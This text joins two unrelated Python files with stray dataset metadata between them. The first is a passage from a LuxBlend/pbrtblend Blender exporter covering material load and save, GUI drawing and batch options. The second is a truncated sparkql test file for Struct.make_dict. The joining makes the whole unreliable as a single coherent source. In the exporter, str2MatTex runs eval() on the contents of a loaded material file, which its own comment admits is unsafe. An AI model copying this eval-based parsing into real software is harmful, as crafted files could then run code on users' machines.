return
if dict:
# remove all current properties in mat that starts with basekey
try:
d = mat.properties['pbrtblend']
for k,v in d.convert_to_pyobject().items():
kn = k
if k[:7]=="__hash:": # decode if entry is hashed (cause of 32chars limit)
l = v.split(" = ")
kn = l[0]
if kn[:len(basekey)]==basekey:
del mat.properties['pbrtblend'][k]
except: print("error") # pass
# assign loaded properties
for k,v in dict.items():
try:
if (basekey!="") and (k=="type"): k = ".type"
# zuegs: following two lines should fix issue http://www.luxrender.net/forum/viewtopic.php?f=16&t=1618&p=14512#p14512
if (basekey!="") and ((k[0]!=".") and (k[0]!=":")): k = ":"+k
if (basekey=="") and (k[0:4]==":mat"): k = k[1:]
luxProp(mat, basekey+k, None).set(v)
if k[-8:] == '.texture':
luxProp(mat, basekey+k[:-8]+'.textured', 'false').set('true')
except: pass
LBX_VERSION = '0.7'
def MatTex2dict(d, tex = None):
global LBX_VERSION
if LBX_VERSION == '0.6':
if tex is not None and tex == True:
d['LUX_DATA'] = 'TEXTURE'
else:
d['LUX_DATA'] = 'MATERIAL'
d['LUX_VERSION'] = '0.6'
return d
elif LBX_VERSION == '0.7':
definition = []
for k in d.keys():
if type(d[k]) == types.IntType:
t = 'integer'
if type(d[k]) == types.FloatType:
t = 'float'
if type(d[k]) == types.BooleanType:
t = 'bool'
if type(d[k]) == types.StringType:
l=None
try:
l = d[k].split(" ")
except: pass
if l==None or len(l)!=3:
t = 'string'
else:
t = 'vector'
definition.append([ t, k, d[k] ])
lbx = {
'type': d['__type__'],
'version': '0.7',
'definition': definition,
'metadata': [
['string', 'generator', 'pbrtblend'],
]
}
return lbx
def format_dictStr(dictStr):
result = ''
pos = 0
indentStr = ' '
newLine = '\n'
for char in dictStr:
if char in ['}', ']']:
result += newLine
pos -= 1
for j in range(0,pos):
result += indentStr
result += char
if char in [',', '{', '[']:
result += newLine
if char in ['{', '[']:
pos += 1
for j in range(0,pos):
result += indentStr
return result
def MatTex2str(d, tex = None):
global LBX_VERSION
if LBX_VERSION == '0.6':
return format_dictStr(str( MatTex2dict(d, tex) )) #.replace(", \'", ",\n\'")
elif LBX_VERSION == '0.7':
return format_dictStr(str( MatTex2dict(d, tex) )) #.replace("], \'", "],\r\n\'").replace("[","\r\n\t[")
def str2MatTex(s, tex = None): # todo: this is not absolutely save from attacks!!!
global LBX_VERSION
s = s.strip()
if (s[0]=='{') and (s[-1]=='}'):
d = eval(s, dict(__builtins__=None))
if type(d)==types.DictType:
if LBX_VERSION == '0.6':
if tex is not None and tex == True:
test_str = 'TEXTURE'
else:
test_str = 'MATERIAL'
if ('LUX_DATA' in d.keys() and d['LUX_DATA'] == test_str) \
and ('LUX_VERSION' in d.keys() and (d['LUX_VERSION'] == '0.6' or d['LUX_VERSION'] == 0.6)):
return d
else:
reason = 'Missing/incorrect metadata'
elif LBX_VERSION == '0.7':
def lb_list_to_dict(list):
d = {}
for t, k, v in list:
if t == 'float':
v = float(v)
d[k] = v
return d
if ('version' in d.keys() and d['version'] in ['0.6', '0.7']) \
and ('type' in d.keys() and d['type'] in ['material', 'texture']) \
and ('definition' in d.keys()):
try:
definition = lb_list_to_dict(d['definition'])
if 'metadata' in d.keys():
definition.update( lb_list_to_dict(d['metadata']) )
return definition
except:
reason = 'Incorrect LBX definition data'
else:
reason = 'Missing/incorrect metadata'
else:
reason = 'Unknown LBX version'
else:
reason = 'Not a parsed dict'
else:
reason = 'Not a stored dict'
print("ERROR: string to material/texture conversion failed: %s" % reason)
return None
luxclipboard = None # global variable for copy/paste content
def showMatTexMenu(mat, basekey='', tex=False):
global luxclipboard, ConnectLrmdb
if tex: menu="Texture menu:%t"
else: menu="Material menu:%t"
menu += "|Copy%x1"
try:
if luxclipboard and (not(tex) ^ (luxclipboard["__type__"]=="texture")): menu +="|Paste%x2"
except: pass
if (tex):
menu += "|Load LBT%x3|Save LBT%x4"
else:
menu += "|Load LBM%x3|Save LBM%x4"
if ConnectLrmdb:
menu += "|Download from DB%x5" #not(tex) and
menu += "|Upload to DB%x6"
# menu += "|%l|dump material%x99|dump clipboard%x98"
r = Draw.PupMenu(menu)
if r==1:
luxclipboard = getMatTex(mat, basekey, tex)
elif r==2: putMatTex(mat, luxclipboard, basekey, tex)
elif r==3:
scn = Scene.GetCurrent()
if (tex):
Window.FileSelector(lambda fn:loadMatTex(mat, fn, basekey, tex), "load texture", luxProp(scn, "lux", "").get()+os.sep+".lbt")
else:
Window.FileSelector(lambda fn:loadMatTex(mat, fn, basekey, tex), "load material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
elif r==4:
scn = Scene.GetCurrent()
if (tex):
Window.FileSelector(lambda fn:saveMatTex(mat, fn, basekey, tex), "save texture", luxProp(scn, "lux", "").get()+os.sep+".lbt")
else:
Window.FileSelector(lambda fn:saveMatTex(mat, fn, basekey, tex), "save material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
elif r==5:
if not tex:
id = Draw.PupStrInput("Material ID:", "", 32)
else:
id = Draw.PupStrInput("Texture ID:", "", 32)
if id: putMatTex(mat, downloadLRMDB(mat, id), basekey, tex)
elif r==6:
global lrmdb_connector
if not lrmdb_connector.submit_object(mat, basekey, tex):
msg = lrmdb_connector.last_error()
else:
msg = 'OK'
Draw.PupMenu("Upload: "+msg+".%t|OK")
# elif r==99:
# for k,v in mat.properties['pbrtblend'].convert_to_pyobject().items(): print(k+"="+repr(v))
# elif r==98:
# for k,v in luxclipboard.items(): print(k+"="+repr(v))
# prin()
Draw.Redraw()
def saveMatTex(mat, fn, basekey='', tex=False):
global LuxIsGUI
d = getMatTex(mat, basekey, tex)
file = open(fn, 'w')
file.write(MatTex2str(d, tex))
file.close()
if LuxIsGUI: Draw.Redraw()
def loadMatTex(mat, fn, basekey='', tex=None):
global LuxIsGUI
file = open(fn, 'r')
data = file.read()
file.close()
data = str2MatTex(data, tex)
putMatTex(mat, data, basekey, tex)
if LuxIsGUI: Draw.Redraw()
activemat = None
def setactivemat(mat):
global activemat
activemat = mat
# scrollbar
class scrollbar:
def __init__(self):
self.position = 0 # current position at top (inside 0..height-viewHeight)
self.height = 0 # total height of the content
self.viewHeight = 0 # height of window
self.x = 0 # horizontal position of the scrollbar
self.scrolling = self.over = False # start without scrolling ;)
def calcRects(self):
# Blender doesn't give us direct access to the window size yet, but it does set the
# GL scissor box for it, so we can get the size from that. (thx to Daniel Dunbar)
size = BGL.Buffer(BGL.GL_FLOAT, 4)
BGL.glGetFloatv(BGL.GL_SCISSOR_BOX, size)
size = size.list # [winx, winy, width, height]
self.winrect = size[:]
self.viewHeight = size[3]
size[0], size[1] = size[2]-20, 0 # [scrollx1, scrolly1, scrollx2, scrolly2]
self.rect = size[:]
if self.position < 0: self.position = 0
if self.height < self.viewHeight: self.height = self.viewHeight
if self.position > self.height-self.viewHeight: self.position = self.height-self.viewHeight
self.factor = (size[3]-size[1]-4)/self.height
self.sliderRect = [size[0]+2, size[3]-2-(self.position+self.viewHeight)*self.factor, size[2]-2, size[3]-2-self.position*self.factor]
def draw(self):
self.calcRects()
BGL.glColor3f(0.5,0.5,0.5); BGL.glRectf(self.rect[0],self.rect[1],self.rect[2],self.rect[3])
if self.over or self.scrolling: BGL.glColor3f(1.0,1.0,0.7)
else: BGL.glColor3f(0.7,0.7,0.7)
BGL.glRectf(self.sliderRect[0],self.sliderRect[1],self.sliderRect[2],self.sliderRect[3])
def getTop(self):
return self.viewHeight+self.position
def scroll(self, delta):
self.position = self.position + delta
self.calcRects()
Draw.Redraw()
def Mouse(self):
self.calcRects()
coord, buttons = Window.GetMouseCoords(), Window.GetMouseButtons()
over = (coord[0]>=self.winrect[0]+self.rect[0]) and (coord[0]<=self.winrect[0]+self.rect[2]) and \
(coord[1]>=self.winrect[1]+self.rect[1]) and (coord[1]<=self.winrect[1]+self.rect[3])
if Window.MButs.L and buttons > 0:
if self.scrolling:
if self.factor > 0: self.scroll((self.lastcoord[1]-coord[1])/self.factor)
Draw.Redraw()
elif self.over:
self.scrolling = True
self.lastcoord = coord
elif self.scrolling:
self.scrolling = False
Draw.Redraw()
if self.over != over: Draw.Redraw()
self.over = over
scrollbar = scrollbar()
# gui main draw
def luxDraw():
global icon_luxblend
BGL.glClear(BGL.GL_COLOR_BUFFER_BIT)
y = int(scrollbar.getTop()) # 420
BGL.glColor3f(0.1,0.1,0.1); BGL.glRectf(0,0,440,y)
BGL.glColor3f(1.0,0.5,0.0); BGL.glRasterPos2i(130,y-21); Draw.Text("v0.6")
BGL.glColor3f(0.9,0.9,0.9)
# drawLogo(icon_luxblend, 6, y-25)
scn = Scene.GetCurrent()
if scn:
luxpage = luxProp(scn, "page", 0)
gui = luxGui(y-70)
# render presets
BGL.glRasterPos2i(10,y-45); Draw.Text("Render presets:")
luxpreset = luxProp(scn, "preset", "1C - Final - medium MLT/Path Tracing (indoor) (recommended)")
presets = getScenePresets()
presetskeys = presets.keys()
presetskeys.sort()
presetskeys.insert(0, "")
presetsstr = "presets: %t"
for i, v in enumerate(presetskeys): presetsstr = "%s %%x%d|%s"%(v, i, presetsstr)
try: i = presetskeys.index(luxpreset.get())
except ValueError: i = 0
Draw.Menu(presetsstr, evtLuxGui, 110, y-50, 220, 18, i, "", lambda e,v: luxpreset.set(presetskeys[v]))
Draw.Button("save", evtSavePreset, 330, y-50, 40, 18, "create a render-settings preset")
Draw.Button("del", evtDeletePreset, 370, y-50, 40, 18, "delete a render-settings preset")
# if preset is selected load values
if luxpreset.get() != "":
try:
d = presets[luxpreset.get()]
for k,v in d.items(): scn.properties['pbrtblend'][k] = v
except: pass
Draw.Button("Material", evtLuxGui, 10, y-70, 80, 16, "", lambda e,v:luxpage.set(0))
Draw.Button("Cam/Env", evtLuxGui, 90, y-70, 80, 16, "", lambda e,v:luxpage.set(1))
Draw.Button("Render", evtLuxGui, 170, y-70, 80, 16, "", lambda e,v:luxpage.set(2))
Draw.Button("Output", evtLuxGui, 250, y-70, 80, 16, "", lambda e,v:luxpage.set(3))
Draw.Button("System", evtLuxGui, 330, y-70, 80, 16, "", lambda e,v:luxpage.set(4))
if luxpage.get() == 0:
BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(10,y-74,90,y-70);BGL.glColor3f(0.9,0.9,0.9)
obj = scn.objects.active
if obj:
if (obj.getType() == "Lamp"):
ltype = obj.getData(mesh=1).getType() # data
if (ltype == Lamp.Types["Area"]): luxLight("Area LIGHT", "", obj, gui, 0)
elif (ltype == Lamp.Types["Spot"]): luxSpot("Spot LIGHT", "", obj, gui, 0)
elif (ltype == Lamp.Types["Lamp"]): luxLamp("Point LIGHT", "", obj, gui, 0)
else:
matfilter = luxProp(scn, "matlistfilter", "false")
mats = getMaterials(obj, True)
if (activemat == None) and (len(mats) > 0):
setactivemat(mats[0])
if matfilter.get() == "false":
mats = Material.Get()
matindex = 0
for i, v in enumerate(mats):
if v==activemat: matindex = i
matnames = [m.getName() for m in mats]
menustr = "Material: %t"
for i, v in enumerate(matnames): menustr = "%s %%x%d|%s"%(v, i, menustr)
gui.newline("MATERIAL:", 8)
r = gui.getRect(1.1, 1)
Draw.Button("C", evtConvertMaterial, r[0]-gui.h, gui.y-gui.h, gui.h, gui.h, "convert blender material to lux material")
Draw.Menu(menustr, evtLuxGui, r[0], r[1], r[2], r[3], matindex, "", lambda e,v: setactivemat(mats[v]))
luxBool("", matfilter, "filter", "only show active object materials", gui, 0.5)
Draw.Button("L", evtLoadMaterial, gui.x, gui.y-gui.h, gui.h, gui.h, "load a material preset")
Draw.Button("S", evtSaveMaterial, gui.x+gui.h, gui.y-gui.h, gui.h, gui.h, "save a material preset")
Draw.Button("D", evtDeleteMaterial, gui.x+gui.h*2, gui.y-gui.h, gui.h, gui.h, "delete a material preset")
if len(mats) > 0:
setactivemat(mats[matindex])
luxMaterial(activemat, gui)
if luxpage.get() == 1:
BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(90,y-74,170,y-70);BGL.glColor3f(0.9,0.9,0.9)
cam = scn.getCurrentCamera()
if cam:
r = gui.getRect(1.1, 1)
luxCamera(cam.data, scn.getRenderingContext(), gui)
gui.newline("", 10)
luxEnvironment(scn, gui)
if luxpage.get() == 2:
BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(170,y-74,250,y-70);BGL.glColor3f(0.9,0.9,0.9)
r = gui.getRect(1.1, 1)
luxSampler(scn, gui)
gui.newline("", 10)
luxRenderer(scn, gui)
gui.newline("", 10)
luxSurfaceIntegrator(scn, gui)
gui.newline("", 10)
luxVolumeIntegrator(scn, gui)
gui.newline("", 10)
luxPixelFilter(scn, gui)
if luxpage.get() == 3:
BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(250,y-74,330,y-70);BGL.glColor3f(0.9,0.9,0.9)
r = gui.getRect(1.1, 1)
luxFilm(scn, gui)
if luxpage.get() == 4:
BGL.glColor3f(1.0,0.5,0.0);BGL.glRectf(330,y-74,410,y-70);BGL.glColor3f(0.9,0.9,0.9)
luxSystem(scn, gui)
gui.newline("", 10)
gui.newline("MATERIALS:", 10)
r = gui.getRect(2,1)
Draw.Button("convert all blender materials", 0, r[0], r[1], r[2], r[3], "convert all blender-materials to lux-materials", lambda e,v:convertAllMaterials())
gui.newline("SETTINGS:", 10)
r = gui.getRect(2,1)
Draw.Button("save defaults", 0, r[0], r[1], r[2], r[3], "save current settings as defaults", lambda e,v:saveluxdefaults())
y = gui.y - 80
if y > 0: y = 0 # bottom align of render button
run = luxProp(scn, "run", "true")
dlt = luxProp(scn, "default", "true")
pipe = luxProp(scn, "pipe", "false")
clay = luxProp(scn, "clay", "false")
nolg = luxProp(scn, "nolg", "false")
lxs = luxProp(scn, "lxs", "true")
lxo = luxProp(scn, "lxo", "true")
lxm = luxProp(scn, "lxm", "true")
lxv = luxProp(scn, "lxv", "true")
global render_status_text
global render_status
if render_status == True:
BGL.glRasterPos2i(10,y+20)
Draw.Text(render_status_text)
else:
BGL.glRasterPos2i(10,y+5)
Draw.Text(render_status_text, "tiny")
def check_pipe_def_exclusion(m, v):
if m == 'd':
dlt.set(["false","true"][bool(v)])
if dlt.get() == 'true':
pipe.set('false')
elif m == 'p':
pipe.set(["false","true"][bool(v)])
if pipe.get() == 'true':
dlt.set('false')
if False: # (run.get()=="true"):
Draw.Button("Render", 0, 10, y+20, 100, 36, "Render with Lux", lambda e,v:CBluxExport(dlt.get()=="true" or pipe.get()=="true", True))
Draw.Button("Render Anim", 0, 110, y+20, 100, 36, "Render animation with Lux", lambda e,v:CBluxAnimExport(dlt.get()=="true" or pipe.get()=="true", True))
else:
Draw.Button("Export", 0, 10, y+20, 100, 36, "Export", lambda e,v:CBluxExport(dlt.get()=="true" or pipe.get()=="true", False))
Draw.Button("Export Anim", 0, 110, y+20, 100, 36, "Export animation", lambda e,v:CBluxAnimExport(dlt.get()=="true" or pipe.get()=="true", False))
# Draw.Toggle("run", evtLuxGui, 265, y+40, 30, 16, run.get()=="true", "start Lux after export", lambda e,v: run.set(["false","true"][bool(v)]))
if (pipe.get() == 'false' and dlt.get() == 'true') or run.get()=='false':
Draw.Toggle("def", evtLuxGui, 295, y+40, 55, 16, dlt.get()=="true", "write to default lxs file", lambda e,v: check_pipe_def_exclusion('d',v))
elif pipe.get() == 'true' and dlt.get() == 'false':
Draw.Toggle("pipe", evtLuxGui, 295, y+40, 55, 16, pipe.get()=="true", "do not write any lxs file", lambda e,v: check_pipe_def_exclusion('p',v))
else:
Draw.Toggle("def", evtLuxGui, 295, y+40, 25, 16, dlt.get()=="true", "write to default lxs file", lambda e,v: check_pipe_def_exclusion('d',v))
Draw.Toggle("pipe", evtLuxGui, 320, y+40, 30, 16, pipe.get()=="true", "do not write any lxs file", lambda e,v: check_pipe_def_exclusion('p',v))
Draw.Toggle("clay", evtLuxGui, 350, y+40, 30, 16, clay.get()=="true", "all materials are rendered as white-matte", lambda e,v: clay.set(["false","true"][bool(v)]))
Draw.Toggle("noLG", evtLuxGui, 380, y+40, 35, 16, nolg.get()=="true", "disables all light groups", lambda e,v: nolg.set(["false","true"][bool(v)]))
if pipe.get() == "false":
Draw.Toggle("main", 0, 265, y+20, 37, 16, lxs.get()=="true", "export scene file", lambda e,v: lxs.set(["false","true"][bool(v)]))
Draw.Toggle("geom", 0, 302, y+20, 38, 16, lxo.get()=="true", "export geometry file", lambda e,v: lxo.set(["false","true"][bool(v)]))
Draw.Toggle("mat", 0, 340, y+20, 37, 16, lxm.get()=="true", "export material file", lambda e,v: lxm.set(["false","true"][bool(v)]))
Draw.Toggle("vol", 0, 377, y+20, 38, 16, lxv.get()=="true", "export volume file", lambda e,v: lxv.set(["false","true"][bool(v)]))
BGL.glColor3f(0.9, 0.9, 0.9)
BGL.glRasterPos2i(330,y+5) ; Draw.Text("Press Q or ESC to quit.", "tiny")
scrollbar.height = scrollbar.getTop() - y
scrollbar.draw()
render_status_text = ''
render_status = False
mouse_xr=1
mouse_yr=1
activeObject = None
activeEvent = None
lastEventTime = 0
key_tabs = {
Draw.ONEKEY: 0,
Draw.TWOKEY: 1,
Draw.THREEKEY: 2,
Draw.FOURKEY: 3,
Draw.FIVEKEY: 4,
}
def luxEvent(evt, val): # function that handles keyboard and mouse events
global activeObject, activemat, activeEvent, lastEventTime, key_tabs
if evt == Draw.ESCKEY or evt == Draw.QKEY:
stop = Draw.PupMenu("OK?%t|Cancel export %x1")
if stop == 1:
Draw.Exit()
return
scn = Scene.GetCurrent()
if scn:
if scn.objects.active != activeObject:
activeObject = scn.objects.active
activemat = None
Window.QRedrawAll()
if (evt == Draw.MOUSEX) or (evt == Draw.MOUSEY): scrollbar.Mouse()
if evt == Draw.WHEELUPMOUSE: scrollbar.scroll(-16)
if evt == Draw.WHEELDOWNMOUSE: scrollbar.scroll(16)
if evt == Draw.PAGEUPKEY: scrollbar.scroll(-50)
if evt == Draw.PAGEDOWNKEY: scrollbar.scroll(50)
# scroll to [T]op and [B]ottom
if evt == Draw.TKEY:
scrollbar.scroll(-scrollbar.position)
if evt == Draw.BKEY:
scrollbar.scroll(100000) # Some large number should be enough ?!
# R key shortcut to launch render
# E key shortcut to export current scene (not render)
# P key shortcut to preview current material
# These keys need time and process-complete locks
if evt in [Draw.RKEY, Draw.EKEY, Draw.PKEY]:
if activeEvent == None and (sys.time() - lastEventTime) > 5:
lastEventTime = sys.time()
if evt == Draw.RKEY:
activeEvent = 'RKEY'
CBluxExport(luxProp(scn, "default", "true").get() == "true" or luxProp(scn, "pipe", "false").get() == "true", True)
activeEvent = None
if evt == Draw.EKEY:
activeEvent = 'EKEY'
CBluxExport(luxProp(scn, "default", "true").get() == "true" or luxProp(scn, "pipe", "false").get() == "true", False)
activeEvent = None
if evt == Draw.PKEY:
activeEvent = 'PKEY'
if activemat != None:
Preview_Update(activemat, '', True, 0, None, None, None)
activeEvent = None
# Switch GUI tabs with number keys
if evt in key_tabs.keys():
luxProp(scn, "page", 0).set(key_tabs[evt])
luxDraw()
Window.QRedrawAll()
# Handle icon button events - note - radiance - this is a work in progress! :)
# if evt == Draw.LEFTMOUSE and not val:
# size=BGL.Buffer(BGL.GL_FLOAT, 4)
# BGL.glGetFloatv(BGL.GL_SCISSOR_BOX, size)
# size= [int(s) for s in size]
# mx, my = Window.GetMouseCoords()
# mousex = mx - size[0]
# print("mousex = %i"%mousex)
# #if((mousex > 2) and (mousex < 25)):
# # Mouse clicked in left button bar
# if((mousex > 399) and (mousex < 418)):
# # Mouse clicked in right button bar
# mousey = my - size[1] - scrollbar.position
# print("mousey = %i"%mousey)
def luxButtonEvt(evt): # function that handles button events
global usedproperties, usedpropertiesfilterobj
if evt == evtLuxGui:
Draw.Redraw()
if evt == evtSavePreset:
scn = Scene.GetCurrent()
if scn:
name = Draw.PupStrInput("preset name: ", "")
if name != "":
usedproperties = {}
usedpropertiesfilterobj = None
luxSurfaceIntegrator(scn)
luxRenderer(scn)
luxSampler(scn)
luxPixelFilter(scn)
# luxFilm(scn)
# luxEnvironment(scn)
saveScenePreset(name, usedproperties.copy())
luxProp(scn, "preset", "").set(name)
Draw.Redraw()
if evt == evtDeletePreset:
presets = getScenePresets().keys()
presets.sort()
presetsstr = "delete preset: %t"
for i, v in enumerate(presets): presetsstr += "|%s %%x%d"%(v, i)
r = Draw.PupMenu(presetsstr, 20)
if r >= 0:
saveScenePreset(presets[r], None)
Draw.Redraw()
if evt == evtLoadMaterial:
if activemat:
mats = getMaterialPresets()
matskeys = mats.keys()
matskeys.sort()
matsstr = "load preset: %t"
for i, v in enumerate(matskeys): matsstr += "|%s %%x%d"%(v, i)
r = Draw.PupMenu(matsstr, 20)
if r >= 0:
name = matskeys[r]
try:
# for k,v in mats[name].items(): activemat.properties['pbrtblend'][k] = v
for k,v in mats[name].items(): luxProp(activemat, k, None).set(v)
except: pass
Draw.Redraw()
if evt == evtSaveMaterial:
if activemat:
name = Draw.PupStrInput("preset name: ", "")
if name != "":
usedproperties = {}
usedpropertiesfilterobj = activemat
luxMaterial(activemat)
saveMaterialPreset(name, usedproperties.copy())
Draw.Redraw()
if evt == evtDeleteMaterial:
matskeys = getMaterialPresets().keys()
matskeys.sort()
matsstr = "delete preset: %t"
for i, v in enumerate(matskeys): matsstr += "|%s %%x%d"%(v, i)
r = Draw.PupMenu(matsstr, 20)
if r >= 0:
saveMaterialPreset(matskeys[r], None)
Draw.Redraw()
if evt == evtConvertMaterial:
if activemat: convertMaterial(activemat)
Draw.Redraw()
if evt == evtLoadMaterial2:
if activemat:
scn = Scene.GetCurrent()
Window.FileSelector(lambda fn:loadMatTex(activemat, fn), "load material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
if evt == evtSaveMaterial2:
if activemat:
scn = Scene.GetCurrent()
Window.FileSelector(lambda fn:saveMaterial(activemat, fn), "save material", luxProp(scn, "lux", "").get()+os.sep+".lbm")
def setFocus(target):
currentscene = Scene.GetCurrent()
camObj = currentscene.objects.camera # currentscene.getCurrentCamera()
if target == "S":
try:
refLoc = (Object.GetSelected()[0]).getLocation()
except:
print("select an object to focus\n")
elif target == "C":
refLoc = Window.GetCursorPos()
else:
refLoc = (Object.Get(target)).getLocation()
dist = Mathutils.Vector(refLoc) - Mathutils.Vector(camObj.getLocation())
camDir = camObj.getMatrix()[2]*(-1.0)
camObj.getData(mesh=1).dofDist = (camDir[0]*dist[0]+camDir[1]*dist[1]+camDir[2]*dist[2])/camDir.length # data
# Parse command line arguments for batch mode rendering if supplied
try:
batchindex = osys.argv.index('--batch')
pyargs = osys.argv[osys.argv.index('--batch')+1:]
except: pyargs = []
if (pyargs != []) and (batchindex != 0):
print("\n\Pbrt v2.0 - BATCH mode\n")
LuxIsGUI = False
scene = Scene.GetCurrent()
context = scene.getRenderingContext()
luxpath = ""
import getopt
o, a = getopt.getopt(pyargs, 's:e:o:t:l:',["scale=","haltspp=","run=", "lbm=", "lbt="])
opts = {}
for k,v in o:
opts[k] = v
if (opts.has_key('--run')) and (opts['--run'] == 'false'):
print("Run: false")
luxProp(scene, "run", "true").set("false")
else:
luxProp(scene, "run", "true").set("true")
if opts.has_key('--scale'):
print("Zoom: %s" %opts['--scale'])
luxProp(scene, "film.scale", "100 %").set(opts['--scale'])
if opts.has_key('--haltspp'):
print("haltspp: %s" %opts['--haltspp'])
luxProp(scene, "haltspp", 0).set(int(opts['--haltspp']))
if opts.has_key('-s'):
print("Start frame: %s" %opts['-s'])
context.startFrame(int(opts['-s']))
else:
print("Error: Start frame not supplied (-s)"); osys.exit(1)
if opts.has_key('-e'):
print("End frame: %s" %opts['-e'])
context.endFrame(int(opts['-e']))
else:
print("Error: End frame not supplied (-e)"); osys.exit(1)
if opts.has_key('-l'):
print("Path to pbrt binary: %s" %opts['-l'])
luxbatchconsolemode = luxProp(scene, "luxbatchc", "false")
luxbatchconsolemode.set("true")
luxpathprop = luxProp(scene, "lux", "")
luxpathprop.set(opts['-l'])
else:
print("Error: path to pbrt binary not supplied (-l)"); osys.exit(1)
if opts.has_key('-o'):
print("Image output path: %s" %opts['-o'])
luxProp(scene, "overrideoutputpath", "").set(opts['-o'])
else:
print("Error: image output path not supplied (-o)"); osys.exit(1)
if opts.has_key('-t'):
print("Temporary export path: %s" %opts['-t'])
luxProp(scene, "datadir", "").set(opts['-t'])
else:
print("Error: Temporary export path not supplied (-t)"); osys.exit(1)
if opts.has_key('--lbm'):
print("Load material: %s" %opts['--lbm'])
mat = Material.Get("Material")
if mat: loadMatTex(mat, opts['--lbm'])
else:
print("Error: No material with name \"Material\" found (--lbm)"); osys.exit(1)
if opts.has_key('--lbt'):
print("Load material: %s" %opts['--lbt'])
mat = Material.Get("Material")
if mat: loadMatTex(mat, opts['--lbt'], ':Kd')
else:
print("Error: No material with name \"Material\" found (--lbt)"); osys.exit(1)
# CBluxAnimExport(True, True)
CBluxAnimExport(True, True, False) # as by zukazuka (http://www.luxrender.net/forum/viewtopic.php?f=11&t=1288)
osys.exit(0)
else:
print("\n\nLuxBlend v0.6 - UI mode\n")
from Blender.Window import DrawProgressBar
LuxIsGUI = True
Draw.Register(luxDraw, luxEvent, luxButtonEvt) # init GUI
luxpathprop = luxProp(Scene.GetCurrent(), "lux", "")
luxpath = luxpathprop.get()
luxrun = luxProp(Scene.GetCurrent(), "run", True).get()
checkluxpath = luxProp(Scene.GetCurrent(), "checkluxpath", True).get()
if checkluxpath and luxrun:
if (luxpath is None) or (sys.exists(luxpath)<=0):
# luxpath not valid, so delete entry from .blend scene file
luxpathprop.delete()
# and re-get luxpath, so we get the path from default-settings
luxpath = luxpathprop.get()
#
LUXRENDER_ROOT = os.getenv('LUXRENDER_ROOT')
if LUXRENDER_ROOT is not None:
LUXRENDER_ROOT = LUXRENDER_ROOT + os.sep
luxpathprop.set(LUXRENDER_ROOT)
luxpath = LUXRENDER_ROOT
if sys.exists(luxpath)>0:
print('LuxRender path set from LUXRENDER_ROOT environment variable')
saveluxdefaults()
if (luxpath is None) or (sys.exists(luxpath)<=0):
print("WARNING: LuxPath \"%s\" is not valid\n"%(luxpath))
scn = Scene.GetCurrent()
if scn:
r = Draw.PupMenu("Installation: Set path to the pbrt software?%t|Yes%x1|No%x0|Never%x2")
if r == 1:
Window.FileSelector(lambda s:luxProp(scn, "pbrt", "").set(Blender.sys.dirname(s)+os.sep), "Select file in Lux path")
saveluxdefaults()
if r == 2:
newluxdefaults["checkluxpath"] = False
saveluxdefaults()
else :
print("Lux path check disabled\n")
| 61.953737
| 9,419
| 0.557422
|
b89948c81c616a7db3eaafcf5c2efcfe025082e4
| 6,521
|
py
|
Python
|
tests/unit/test_fields/test_struct_make_dict.py
|
radeklat/sparkql
|
57d55c7599460f2e7e5957c037d7c25cedb92647
|
[
"MIT"
] | 6
|
2020-02-12T14:01:08.000Z
|
2020-05-29T05:35:09.000Z
|
tests/unit/test_fields/test_struct_make_dict.py
|
radeklat/sparkql
|
57d55c7599460f2e7e5957c037d7c25cedb92647
|
[
"MIT"
] | 31
|
2020-02-09T18:52:52.000Z
|
2020-05-15T16:03:32.000Z
|
tests/unit/test_fields/test_struct_make_dict.py
|
radeklat/sparkql
|
57d55c7599460f2e7e5957c037d7c25cedb92647
|
[
"MIT"
] | 1
|
2020-04-03T19:23:08.000Z
|
2020-04-03T19:23:08.000Z
|
"""
Suite of tests for Struct make_dict.
Partner to `test_struct.py`.
"""
import re
from collections import OrderedDict
from typing import Mapping, Any
import pytest
from sparkql.exceptions import StructInstantiationArgumentsError, StructInstantiationArgumentTypeError
from sparkql import Struct, String, Float, Array
from tests.utilities import does_not_raise
def assert_ordered_dicts_equal(dict_a: Mapping[Any, Any], dict_b: Mapping[Any, Any]):
assert dict_a == dict_b
assert OrderedDict(dict_a) == OrderedDict(dict_b)
class TestStructMakeDict:
@staticmethod
def should_take_keyword_arg_and_resolve_property_name_to_explicit_name():
# given
class AnObject(Struct):
text = String(name="explicit_text_field_name")
# when
dic = AnObject.make_dict(text="text_value")
# then
assert_ordered_dicts_equal(dic, {"explicit_text_field_name": "text_value"})
@staticmethod
def should_take_positional_arg():
# given
class AnObject(Struct):
text = String()
# when
dic = AnObject.make_dict("text_value")
# then
assert_ordered_dicts_equal(dic, {"text": "text_value"})
@staticmethod
def should_obey_schema_ordering():
# given
class AnObject(Struct):
text_field = String(name="explicit_text_name")
numeric_field = Float(name="explicit_numeric_name")
# when
dic = AnObject.make_dict(numeric_field=7.0, text_field="text_value")
# then
assert_ordered_dicts_equal(dic, {"explicit_text_name": "text_value", "explicit_numeric_name": 7})
@staticmethod
def should_fail_when_defaulting_a_non_nullable_to_null():
# given
args = ["text value"]
kwargs = {}
class AnObject(Struct):
text = String(name="alt_name")
numeric = Float(nullable=False)
# when, then
with pytest.raises(
StructInstantiationArgumentTypeError,
match=re.escape("Non-nullable field cannot have None value (field name = 'numeric')"),
):
AnObject.make_dict(*args, **kwargs)
@staticmethod
def should_default_a_nullable_to_null():
# given
args = []
kwargs = {"numeric": 3.4}
class AnObject(Struct):
text = String(name="alt_name")
numeric = Float(nullable=False)
# when
dic = AnObject.make_dict(*args, **kwargs)
# then
assert_ordered_dicts_equal(dic, {"alt_name": None, "numeric": 3.4})
@staticmethod
@pytest.mark.parametrize(
"args,kwargs,expected_error_message",
[
pytest.param(
["value"],
{"text": "value", "numeric": 7.0},
"There were struct properties with multiple values. Repeated properties: text \n"
"Properties required by this struct are: text, numeric",
id="surplus-mixed-args",
),
pytest.param(
["value", 7.0, 3.0],
{},
"There were 1 surplus positional arguments. Values for surplus args: 3.0 \n"
"Properties required by this struct are: text, numeric",
id="surplus-positional-args",
),
pytest.param(
[],
{"text": "value", "numeric": 7.0, "mystery_argument": "value"},
"There were surplus keyword arguments: mystery_argument \n"
"Properties required by this struct are: text, numeric",
id="surplus-keyword-args",
),
pytest.param(
[],
